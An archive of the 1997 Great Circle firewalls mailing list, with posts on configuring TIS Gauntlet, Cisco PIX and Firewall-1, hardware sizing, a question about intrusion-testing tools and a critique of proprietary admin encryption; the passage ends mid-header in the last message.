From owner-firewalls-outgoing Sun Jun 1 01:00:10 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id AAA00398 for firewalls-outgoing; Sun, 1 Jun 1997 00:56:08 -0700 (PDT) Received: from flex.flex.ro (flex.flex.ro [193.230.255.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id AAA00391 for ; Sun, 1 Jun 1997 00:56:00 -0700 (PDT) Received: from scully (dial02.flex.ro [193.230.255.102]) by flex.flex.ro (8.7.5/8.7.3) with ESMTP id KAA15416 for ; Sun, 1 Jun 1997 10:48:24 +0300 Message-Id: <199706010748.KAA15416@flex.flex.ro> From: "VIOREL DEHELEAN" To: Subject: Test Date: Sun, 1 Jun 1997 10:58:58 +0300 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Testing some mail bugs in Firewalls system... Sorry From owner-firewalls-outgoing Sun Jun 1 10:17:26 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA23715 for firewalls-outgoing; Sun, 1 Jun 1997 09:51:41 -0700 (PDT) Received: from sbc.com (swbcs002.sbc.com [204.251.74.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA23680 for ; Sun, 1 Jun 1997 09:51:22 -0700 (PDT) Received: (from uucp@localhost) by sbc.com (8.8.4/8.8.4) id MAA29587 for ; Sun, 1 Jun 1997 12:05:51 -0500 (CDT) Received: from swgate2.sbc.com(155.179.59.221) by swbcs002.sbc.com via smap (3.2) id xma029581; Sun, 1 Jun 97 12:05:27 -0500 Received: by swgate2 (Smail-3.2 1996-Jul-4 #1 built 1996-Jul-23) id ; Sun, 1 Jun 1997 11:55:05 -0500 (CDT) Received: from bastion.emtso.sbms.com(really [198.136.1.22]) by swgate2.sbc.com via sendmail with smtp id for ; Sun, 1 Jun 1997 11:54:35 -0500 (CDT) Received: from eulsun (eulsun.emtso.sbms.com [199.59.8.6]) by bastion.emtso.sbms.com (8.7.1/8.7.1) with SMTP id LAA26341 for ; Sun, 1 Jun 1997 11:53:31 -0500 (CDT) Received: from eulsun by eulsun (4.1/SMI-4.1) id AA27831; Sun, 1 Jun 97 11:53:31 CDT Message-Id: <3391A90A.167EB0E7@dfwnet.sbms.sbc.com> Date: Sun, 01 Jun 1997 11:53:30 -0500 From: Greg Harp X-Mailer: Mozilla 3.01 (X11; I; SunOS 4.1.3_U1 sun4m) Mime-Version: 1.0 To: firewalls@greatcircle.com Subject: TIS Gauntlet -- pass all packets for certain IPs? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have an interesting problem. I have a new network (actually, a new service, but we'll leave out the "proprietary" details) going in which much necessarily be connected to both my main data network and the "outside" world, including both our customers and the "untamed" Internet. Here's a quick idea of how things go together: ------ | | "network entities" --++-- || --++-- | | Service Complex outside: --++-- || --Internet ------ ------ ------ ------ / | |-----| |-----| |-----| |< ------ ------ ------ ------ \ "Main" Cisco TIS Cisco --Customer data router Gauntlet router network I need TCP (telnet and X) and UDP (SNMP) access from the "Main" network to the service complex for management purposes. I must also pass both TCP and UDP (all ports) between the "outside" and the "network entities" (NEs, for short). The service complex acts as a transparent bridge for the IP addresses associated with the NEs. The IP addresses of the NEs (which have public Class C networks dedicated to them which differ from the rest of the internal net) are the only ones which will be accessible from the outside world (hence the only advertised routes), but as stated it must appear as if they are "directly" on the Internet or the customer's network. Security of the NEs themselves is of no concern, but security of the Service complex and the "Main" data network is of extreme concern. The customers are responsible for their own security, although we will not be routing packets between them and the Internet. We currently have a TIS Gauntlet (v3.2a) system available for use in this application, but I'm stumped as to how to get it to "disappear" with respect to this certain range of addresses. For all intents and purposes, when faced with a source (when outgoing) or destination (when incoming) address in the range dedicated to the NEs, I want it to act like a router. At first, no other traffic will pass through the Gauntlet, although perhaps in the near future there will be certain authenticated traffic allowed to the Service complex itself, as well as possible traffic between the "Main" network and the Internet. These, of course, can be achieved using "normal, everyday" proxies and authentication. I'm required to use an application gateway-type system here by company policy, with which I agree. While this restricted connectivity could be achieved via an access list in a router, that is not considered secure enough. We need the logging and "failsafes" of a real firewall. Any suggestions of how to do with with the Gauntlet would be much appreciated. Although I'd prefer to use the TIS product, other ideas are also welcome. BTW, our corporate IS folks [ the ones who will audit this once I get it done ;) ] aren't big fans of the PIX firewalls. TIA... --Greg From owner-firewalls-outgoing Sun Jun 1 11:20:49 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA01337 for firewalls-outgoing; Sun, 1 Jun 1997 11:06:22 -0700 (PDT) Received: from nebula.online.ee (nebula.online.ee [194.106.96.11]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA01294 for ; Sun, 1 Jun 1997 11:06:05 -0700 (PDT) Received: from localhost (jk@localhost) by nebula.online.ee (8.8.3/8.8.3) with SMTP id VAA05063 for ; Sun, 1 Jun 1997 21:09:07 +0300 (EET DST) Date: Sun, 1 Jun 1997 21:09:05 +0300 (EET DST) From: Jyri Kaljundi X-Sender: jk@nebula To: Firewalls@GreatCircle.COM Subject: Re: Security Crazy In-Reply-To: <199706010800.BAA00511@honor.greatcircle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sat, 31 May 1997, Marcus J. Ranum wrote: =20 >> my CEO has gone security crazy [...] win95=20 >=20 > He's a bit unclear on the concept, isn't he? I am pretty sure there actually are good commercial systems available to make large number of win95 machines much more secure than as they are out-of-box.=20 Axent Enterprise Access Control for Windows 95 is one such beast, more information is at http://www.axent.com/product/eacw/eacw.htm J=FCri From owner-firewalls-outgoing Sun Jun 1 12:15:06 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA07115 for firewalls-outgoing; Sun, 1 Jun 1997 12:13:45 -0700 (PDT) Received: from norwich.valley.net (norwich.valley.net [198.115.160.12]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id MAA07108 for ; Sun, 1 Jun 1997 12:13:40 -0700 (PDT) Received: from hanover.VALLEY.NET (dns [198.115.160.10]) by norwich.valley.net (8.8.5/8.8.5) with SMTP id PAA07565 for ; Sun, 1 Jun 1997 15:16:52 -0400 Received: by hanover.VALLEY.NET (blitz.valley.net) via SMTP from kip-2-134.valley.net id <3756284> 01 Jun 97 15:16:44 EDT X-Sender: randy.witlicki@pop.valley.net (Unverified) Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sun, 1 Jun 1997 15:19:57 -0400 To: firewalls@greatcircle.com From: "Randy.Witlicki." Subject: Apparent ANSWER: Cisco PIX Version 4 udp problem Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Don't you just love it when you answer your own post? So there I am, out for my afternoon run. Are nice spring thoughts in my mind? No, its full of packets and protocols and such. A probable answer hits me, so I get back to the PIX and turn on verbose syslogging. In my previous post I said: > ...... PIX firewall Version 4.0.4 > However, when I try the Streamworks or VDOLive web plug-ins, >I get the following at the PIX console (with no *established* >command in the configuration): > ><162> 106006 deny inbound udp from x.x.x.x 7001 to 192.168.1.2 1144 > and ><162> 106006 deny inbound udp from x.x.x.x 7001 to 192.168.1.2 1263 I try a site with VDO that I know is not very big. It works. I go back to my test case and it fails. The PIX syslog output has: <166> 304001 192.168.1.2 accessed URL 207.40.202.22:/nbrx.vdo HTTP/1.0 followed shortly by: <162> 106006 deny inbound udp from 207.40.202.254 7001 to 192.168.1.2 1191 This is on http://intv.net % traceroute intv.net traceroute to intv.net (207.40.202.22), 30 hops max, 40 byte packets ...... 15 AccessUS-1.ChcgIL.savvis.com (206.114.200.250) 16 vision.accessus.net (207.40.202.254) So the URL was at .22 and the UDP stream came from .254 and it looks like the cisco PIX "enhanced multimedia Adaptive Security algorithm" (to use cisco's terminology) does not allow for this situation. - Randy randy.witlicki@valley.net Norwich, Vermont USA - From owner-firewalls-outgoing Sun Jun 1 14:30:18 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA15070 for firewalls-outgoing; Sun, 1 Jun 1997 14:22:58 -0700 (PDT) Received: from mail.ruhrgebiet.individual.net (in-ruhr.ruhr.de [141.39.224.38]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id OAA15036 for ; Sun, 1 Jun 1997 14:22:49 -0700 (PDT) Received: (from admin@localhost) by mail.ruhrgebiet.individual.net (8.8.5/8.8.5) with UUCP id WAA02396; Sun, 1 Jun 1997 22:42:56 +0200 (MET DST) Received: from hostname.devnull.ruhr.de (benedikt@hostname.devnull.ruhr.de [192.168.122.11]) by devnull.local.net (8.6.12/8.6.9) with ESMTP id OAA01203; Sun, 1 Jun 1997 14:29:13 +0200 Received: (from benedikt@localhost) by hostname.devnull.ruhr.de (8.7.5/8.7.3) id OAA00897; Sun, 1 Jun 1997 14:44:34 +0200 To: Dana Bourgeois Cc: "firewalls@GreatCircle.COM" Subject: Re: (Fwd) Ukiah Software References: <01BC6A86.AF5E0E30@pinpc30.corp.portal.com> Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit From: Benedikt Stockebrand Date: 01 Jun 1997 14:44:33 +0200 In-Reply-To: Dana Bourgeois's message of Tue, 27 May 1997 10:15:28 -0700 Message-ID: <87raemcx1q.fsf@devnull.ruhr.de> Lines: 20 X-Mailer: Gnus v5.3/Emacs 19.34 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Dana Bourgeois writes: > No, the problem I > have with businesses like cyberpromo is that one method they use to avoid SPAM > filters is forged mail. Forged mail and news headers should be illegal with heavy > criminal penalties and simple civil remedies (and triple damages!!) Check the latest digest in the comp.risks newsgroup about this. Some folks are currently trying to sue a somewhat minor spammer---I suppose they want to create a precedence(exp?) case so there'll be a reasonable chance to deal with the Big Bastards (TM) later on. Ben -- Ben(edikt)? Stockebrand Runaway ping.de Admin---Never Ever Trust Old Friends My name and email address are not to be added to any list used for advertising purposes. Any sender of unsolicited advertisement e-mail to this address im- plicitly agrees to pay a DM 500 fee to the recipient for proofreading services. From owner-firewalls-outgoing Sun Jun 1 15:04:34 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA17648 for firewalls-outgoing; Sun, 1 Jun 1997 14:51:10 -0700 (PDT) Received: from warp.techno.org (warp.techno.org [194.23.149.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id OAA17629 for ; Sun, 1 Jun 1997 14:51:02 -0700 (PDT) Received: (qmail 2084 invoked by uid 500); 1 Jun 1997 21:54:20 -0000 Date: Sun, 1 Jun 1997 23:54:20 +0200 (MET DST) From: Patrik Backstrom To: firewalls@greatcircle.com Subject: Firewall-1 3.0 prices Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=iso-8859-1 Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I would like to know the approx listing prices for Firewall-1 unlimited users with and without encrypting support in the US and in UK. Thanks in advance. /pb --------------------------------------------------------------------- Patrik B=E4ckstr=F6m (BOFH) Phone........: +46-(0)706-661928 Hjalmar Bergmans gata 50 Homepage.....: http://warp.techno.org/~pb 422 52 Hisings Backa E-Mail.......: pb@techno.org PGP Pub Key......: http://warp.techno.org/~pb/pgpkey \.....: finger pb@techno.org --------------------------------------------------------------------- From owner-firewalls-outgoing Sun Jun 1 15:49:03 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id PAA22019 for firewalls-outgoing; Sun, 1 Jun 1997 15:30:07 -0700 (PDT) Received: from smtp3.erols.com (smtp3.erols.com [205.252.116.103]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id PAA21999 for ; Sun, 1 Jun 1997 15:29:55 -0700 (PDT) Received: from brutus (wdr-as2s05.erols.com [207.172.230.68]) by smtp3.erols.com (8.8.5/8.8.5) with ESMTP id SAA02365 for ; Sun, 1 Jun 1997 18:33:05 -0400 Message-Id: <199706012233.SAA02365@smtp3.erols.com> From: "Luke Gill" To: Subject: Sun Sparc20 FDDI and FAST Ethernet Performance Specs Date: Sun, 1 Jun 1997 18:31:37 -0400 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1161 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Has anyone tested the throughput on a Sun Sparc20 with sbus FDDI and FAST Ethernet cards? If, so what is the throughput? Also, if available has the same testing been done with those cards with a Gauntlet firewall installed on the box? Configurations I am interested in: 1. SUN FDDI sbus card to Sun FDDI sbus card 2. SUN FAST ethernet sbus card to Sun FAST Ethernet sbus card 3. #1 with Gauntlet 3.2a installed 4. #2 with Gauntlet 3.2a installed Need these numbers to corroborate or disprove some testing I am currently doing in my own test environment. Any info would be appreciated. Luke Gill From owner-firewalls-outgoing Sun Jun 1 21:45:09 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id VAA16600 for firewalls-outgoing; Sun, 1 Jun 1997 21:34:53 -0700 (PDT) Received: from gatekeeper.Bridge.COM (gatekeeper.bridge.com [167.76.159.11]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id VAA16590 for ; Sun, 1 Jun 1997 21:34:47 -0700 (PDT) Received: (from mailproxy@localhost) by gatekeeper.Bridge.COM (8.6.12/8.6.9) id XAA24020; Sun, 1 Jun 1997 23:33:47 -0500 Received: from dns1srv.bridge.com(167.76.36.6) by gatekeeper.Bridge.COM via smap (V1.3) id sma024018; Sun Jun 1 23:33:36 1997 Received: from enzo (enzo.bridge.com [167.76.24.29]) by dns1srv.bridge.com (8.7.6/8.7.3) with SMTP id XAA29191; Sun, 1 Jun 1997 23:37:48 -0500 (CDT) Date: Sun, 1 Jun 1997 23:36:03 -0500 (CDT) From: Ken Hardy X-Sender: ken@enzo To: VIOREL DEHELEAN cc: firewalls@GreatCircle.COM Subject: Re: Test In-Reply-To: <199706010748.KAA15416@flex.flex.ro> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sun, 1 Jun 1997, VIOREL DEHELEAN wrote: > Testing some mail bugs in Firewalls system... > Sorry You should be, disturbing thousands of disinterested people for your private testing needs. Anyone who has occasional need to test outgoind and/or incoming mail handling should get a reflector account, such as is available for free from www.iname.com. Subscribe for an alias to your own real mail address. Send a message to the alias. If it lands in your mailbox you've successfully tested mail delivery in both directions. This makes for a quick and easy check of the integrity of the mail delivery system and of the firewall insofar as it's related. Another indispensible tool is a shell account on a remote system from which you can examine your public DNS, see exactly how addresses in your outbound mail appears, run test probes of your own firewall, &c., &c., &c. -- KH From owner-firewalls-outgoing Mon Jun 2 02:15:17 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id CAA02874 for firewalls-outgoing; Mon, 2 Jun 1997 02:03:06 -0700 (PDT) Received: from garanti1.garanti.com.tr (garanti1.garanti.com.tr [194.54.51.100]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id CAA02858 for ; Mon, 2 Jun 1997 02:02:54 -0700 (PDT) Received: from Mailhub by garanti1.garanti.com.tr id AA16228; Mon, 2 Jun 1997 11:33:40 +0400 Received: from GarantiUser by GarantiMailServer id AA07782; Mon, 2 Jun 1997 11:32:58 +0400 Received: from fw1.fw.garanti.com.tr by manage1.fw.garanti.com.tr (AIX 4.1/UCB 5.64/4.03) id AA06700; Mon, 2 Jun 1997 11:31:34 +0400 Message-Id: <3393043F.27FF@garanti.com.tr> Date: Mon, 02 Jun 1997 10:34:55 -0700 From: Cihan Subasi Reply-To: csubasi@garanti.com.tr Organization: Garanti Ticaret X-Mailer: Mozilla 3.0Gold (Win16; I) Mime-Version: 1.0 To: Firewall Mailing List Subject: FW-1 evaluation.... Content-Type: text/plain; charset=iso-8859-9 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am in the process of evaluating FW-1 and also comparing it with SNG...in the demo environment we have one network (a C-class) as an internal network, one DMZ (a subnet of A-class network) and external network (rest of A-class network) but in the reallity we'll have C-class on the external and rest of A-class network will be the internal network.My question how the subnets will route the Internet packets to the firewall since their default gateway will not be FW-1? In SNG this poblem was solved by using SOCKS and in each client we configured SNG as a SOCKS server , in this case all netscape packets are forwarded to SOCKS server. I believe in FW-1 this forwarding should be done by configuring static routes in the gateways, can anybody help me to solve this problem, how will I route all packets other then the ones with destination address of the A-class network to the FW-1? Thanks, *************************************************************** Cihan Subasi Garanti Ticaret, Istanbul Turkey email= cihans@garanti.com.tr or csubasi@garanti.com.tr Phone= +902126570404 Fax = +902126570473 *************************************************************** From owner-firewalls-outgoing Mon Jun 2 02:51:16 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id CAA05260 for firewalls-outgoing; Mon, 2 Jun 1997 02:41:10 -0700 (PDT) Received: from warp.techno.org (warp.techno.org [194.23.149.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id CAA05252 for ; Mon, 2 Jun 1997 02:41:04 -0700 (PDT) Received: (qmail 4337 invoked by uid 500); 2 Jun 1997 09:44:23 -0000 Date: Mon, 2 Jun 1997 11:44:22 +0200 (MET DST) From: Patrik Backstrom To: firewalls@greatcircle.com Subject: Sun Sparc 5 vs. Sun Ultra with Firewall-1 Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=iso-8859-1 Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: firewalls-owner@GreatCircle.COM Precedence: bulk How much traffic can a Sun Sparc 5 handle, with a Firewall-1? We currently have a 2MBit E1 connection to the Internet, and there are about 75-100 active connection at the same time, and it's steadily growing. About 25% of the connections are from 'hidden' private networks, so it has to be translated. Can a SS5 handle this, or should we go for an Ultra? What's the limit for what the SS5 can handle? Thanks in advance. /pb --------------------------------------------------------------------- Patrik B=E4ckstr=F6m (BOFH) Phone........: +46-(0)706-661928 Hjalmar Bergmans gata 50 Homepage.....: http://warp.techno.org/~pb 422 52 Hisings Backa E-Mail.......: pb@techno.org PGP Pub Key......: http://warp.techno.org/~pb/pgpkey \.....: finger pb@techno.org --------------------------------------------------------------------- From owner-firewalls-outgoing Mon Jun 2 03:49:22 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id DAA12794 for firewalls-outgoing; Mon, 2 Jun 1997 03:36:27 -0700 (PDT) Received: from otmfire.otm.it (otmfire.otm.it [192.106.1.154]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id DAA12787 for ; Mon, 2 Jun 1997 03:36:21 -0700 (PDT) Received: from relay (monteverdi.iunet.it [192.106.0.187]) by otmfire.otm.it (8.8.4/8.7.3) with ESMTP id MAA09733 for ; Mon, 2 Jun 1997 12:45:37 -0100 Message-Id: <199706021345.MAA09733@otmfire.otm.it> From: "Maurizio Fiocchi" To: Subject: PIX and Firewall-1 Date: Mon, 2 Jun 1997 12:33:47 +0200 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1161 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am appraising two firewall, the first Pix and the second Firewall-1. From an attentive analysis I have noticed that the two SW have a notable difference regarding the characteristics of administration and of performances. I was wondering an analysis it exists or a comparison between the two SW so that I could choose without mistake. ? Do available documents exist ? Thank you From owner-firewalls-outgoing Mon Jun 2 04:15:47 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id EAA15566 for firewalls-outgoing; Mon, 2 Jun 1997 04:08:49 -0700 (PDT) Received: from cpk-mail-relay1.bbnplanet.com (cpk-mail-relay1.bbnplanet.com [192.239.16.198]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id EAA15557 for ; Mon, 2 Jun 1997 04:08:43 -0700 (PDT) Received: from endeavour.transquest.com (transquest.com [206.240.42.2]) by cpk-mail-relay1.bbnplanet.com (8.7.6/MAIL-RELAY) with SMTP id HAA16026 for ; Mon, 2 Jun 1997 07:12:05 -0400 (EDT) Received: from gcs-tq.transquest.com by endeavour.transquest.com via smtpd (for cpk-mail-relay1.bbnplanet.com [192.239.16.198]) with SMTP; 2 Jun 1997 11:01:20 UT Received: from satlmsghub02.delta-air.com by transquest.com (SMI-8.6/SMI-SVR4) id HAA01888; Mon, 2 Jun 1997 07:12:33 -0400 Message-Id: <199706021112.HAA01888@transquest.com> Received: by SATLMSGHUB02 with Internet Mail Service (5.0.1457.3) id ; Mon, 2 Jun 1997 07:10:19 -0400 From: "Walczak, Joe" To: "'Firewalls@greatcircle.com'" Subject: RE: Intrusion testing Q&A Date: Mon, 2 Jun 1997 07:14:58 -0400 X-Priority: 3 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.0.1457.3) Content-Type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Might I suggest ISS's Safesuite product. I was recently certified on the product, and it is the best for probing, intrusion and scanning. The firewall scanner portion does a good job by simulating hacker attack techniques as well. Joe Walczak TransQuest,Inc > ---------- > From: Bill Stout[SMTP:stoutb@pios.com] > Sent: Friday, May 30, 1997 5:20 PM > To: firewalls@greatcircle.com > Subject: Intrusion testing Q&A > > Is there a Firewall 'Intrusion testing' list somewhere? > > I would like to put on my 'black hat' and intrusion test systems I > work > with. I would like to put a step-by-step intrusion test procedure > together > to follow for each install. (Hmm, as I write this it occurs to me I > could > pick apart SATAN and such for starters)... > > I'm also looking for Windows-based IP Fragmentation tools to > break-through > Packet Filtering or State-based firewalls, and similar tools to break > through 'generic-gw' ports that people kludge together for > SQL/RealAudio/HTTPS/NetBIOS/NFS. > > 'Just the tools, maam', not theories. I also am specifically > targeting > breaking in, not D.O.S. attacks, and am ignoring trying to hide > logging traces. > > Bill Stout > > P.S. - You might not want to cc' the list replying to this one... > > -----BEGIN PGP PUBLIC KEY BLOCK----- > Version: 2.6.2 > > mQCNAzONuYYAAAEEAKjxmuKulor4vNi5XLPXLYOOg6/9pc6CqcepWm7MMtXaeHN7 > hHUhOT/q55bHtKX6wv97U8jfuZE75pcBTEWpD3yux94+x/RObvQfXO8iAh2KQAk6 > eUtLlR5i79AJ85hLB5WqGcu1mqR89bizNXhPgts+/ULw5UKOODA4r+6ptr35AAUR > tBxCaWxsIFN0b3V0IDxzdG91dGJAcGlvcy5jb20+ > =dlVd > -----END PGP PUBLIC KEY BLOCK----- > > From owner-firewalls-outgoing Mon Jun 2 05:00:18 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id EAA21174 for firewalls-outgoing; Mon, 2 Jun 1997 04:43:54 -0700 (PDT) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id EAA21141 for ; Mon, 2 Jun 1997 04:43:45 -0700 (PDT) Received: (adam@localhost) by homeport.org (8.8.5/8.6.9) id HAA15210; Mon, 2 Jun 1997 07:44:00 -0400 (EDT) From: Adam Shostack Message-Id: <199706021144.HAA15210@homeport.org> Subject: Re: Encrypted traffic between FW-1 GUI client and FW-1 Management Server? In-Reply-To: <338A9536.B6F42295@nii.ncb.gov.sg> from Martin Khoo at "May 27, 97 04:03:02 pm" To: martin@nii.ncb.gov.sg Date: Mon, 2 Jun 1997 07:44:00 -0400 (EDT) Cc: drexx@pspi.com.ph, firewalls@GreatCircle.COM, Ronnie.Ng@Asia.Sun.COM, fw-1-mailinglist@us.checkpoint.com X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I find the use of a proprietary, unpublished encryption algorithim for administration really quite scary. See the Snake Oil FAQ, http://www.research.megasoft.com/people/cmcurtin/snake-oil-faq.html for some arguments against secret and unpublished ciphers. Also, the function you want in a FW remote admin module is authentication, encryption is useful for keeping your rules secret. (I assume that they're not passing the password over the encrypted link, since there is an obvious replay attack against the start of the connection.) You really want to know that the entire connection is the same one, and that no packet has been inserted, modified, or deleted. This is the functionality that you get from the IPsec Authentication Header. Encryption does not provide it. Adam Martin Khoo wrote: | > |> Does anybody know whether the traffic between GUI Firewall | > Management Client and Firewall Management | > |> Server is encrypted or not? | > I believe that if it's the VPN edition, the FW-1 traffic would then be | > | > encrypted. | | Traffic between the GUI client and the Mgmt. server is encrypted (it has | nothing to do with whether it is a VPN or non-VPN version) using | Checkpoint's encryption algo. called FWZ1 (if I remember correctly) -- "It is seldom that liberty of any kind is lost all at once." -Hume From owner-firewalls-outgoing Mon Jun 2 07:45:30 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id HAA01622 for firewalls-outgoing; Mon, 2 Jun 1997 07:33:20 -0700 (PDT) Received: from brimstone.rnb.com (brimstone.rnb.com [204.178.80.14]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id HAA01613 for ; Mon, 2 Jun 1997 07:33:13 -0700 (PDT) Received: by brimstone.rnb.com; id KAA01229; Mon, 2 Jun 1997 10:36:24 -0400 Received: from relay.rnb.com(199.99.101.2) by brimstone.rnb.com via smap (3.2) id xma001072; Mon, 2 Jun 97 10:36:02 -0400 Received: from monarch.rnb.com (monarch [150.1.29.115]) by relay.rnb.com (8.8.5/8.8.5) with SMTP id KAA24114; Mon, 2 Jun 1997 10:36:01 -0400 (EDT) Comments: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Comments: Internet Message: Sender identity is not verified. Comments: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Message-ID: X-Mailer: XFMail 1.2-alpha [p0] on Solaris Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 Date: Mon, 02 Jun 1997 10:31:54 -0400 (EDT) Organization: Republic National Bank From: Ken Kempster To: fwtk , firewalls Subject: Plug-gw- One to many relationship Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all, Has anyone gotten a one to many relationship to work with FWTK 2.0? I want to be able to specify x.x.x.x plug-to * or x.x.x.x plug-to x.x.x.x x.x.x.x etc. thanx for any help. |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| | Ken Kempster kempster@monarch.rnb.com | | Network Systems Engineer _\|/_ | | Republic National Bank (o o) | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~oOO-(_)-OOo~~~~~~~~~~~~~~ From owner-firewalls-outgoing Mon Jun 2 08:45:25 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA06090 for firewalls-outgoing; Mon, 2 Jun 1997 08:32:42 -0700 (PDT) Received: from freenet.grfn.org (grfn.org [206.30.236.51]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA06076 for ; Mon, 2 Jun 1997 08:32:36 -0700 (PDT) Received: from unknown (dlup63.i2k.com [199.176.248.63]) by freenet.grfn.org (8.8.5/8.8.5) with SMTP id LAA15212 for ; Mon, 2 Jun 1997 11:30:31 -0400 (EDT) Message-ID: X-MSMail-Priority: Normal X-Priority: 3 To: "Firewalls Mailing List" MIME-Version: 1.0 From: "Mariko Yashada" Subject: ISP Connection Date: Mon, 02 Jun 97 11:37:15 PDT Content-Type: text/plain; charset="ISO-8859-1"; X-MAPIextension=".TXT" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk My company is currently getting Internet access through a local ISP, using PPP connections. We are now considering replacing the dial-up connections with a leased line to the ISP. We will leave our web server at the ISP and will continue to use their e-mail server. There will be a router at the ISP end of the line. The line will connect to our Enterprise Network through a router at our end. We will also put a proxy server at our end to filter out going access and do NAT. The ISP people say this type of connection is more secure than a direct connection to the Internet through say MCI, becuase our router will be "hidden" behind their routing system. The IP address of our router will not be accessable from outside the ISP domain. We will not allow incomming connections such as telnet or ftp. We will restrict access from inside the company to e-mail, http, ftp and probably audio. My question is, how secure is this type of connection? How difficult is it for someone outside the ISP domain to discover and access our connection? Thanks, Mariko From owner-firewalls-outgoing Mon Jun 2 09:00:46 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA05894 for firewalls-outgoing; Mon, 2 Jun 1997 08:31:08 -0700 (PDT) Received: from vmsuser.acsu.unsw.EDU.AU (vmsuser.acsu.unsw.EDU.AU [129.94.112.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA05793 for ; Mon, 2 Jun 1997 08:30:45 -0700 (PDT) Received: from 129.94.15.30 by vmsuser.acsu.unsw.EDU.AU (PMDF V4.3-13 #10833) id <01IJM9Q15K74HT6XBR@vmsuser.acsu.unsw.EDU.AU>; Tue, 03 Jun 1997 01:36:17 +1000 Date: Tue, 03 Jun 1997 01:26:42 +1000 From: "Chartas C. " Subject: E-Commerce Links on various aspects To: 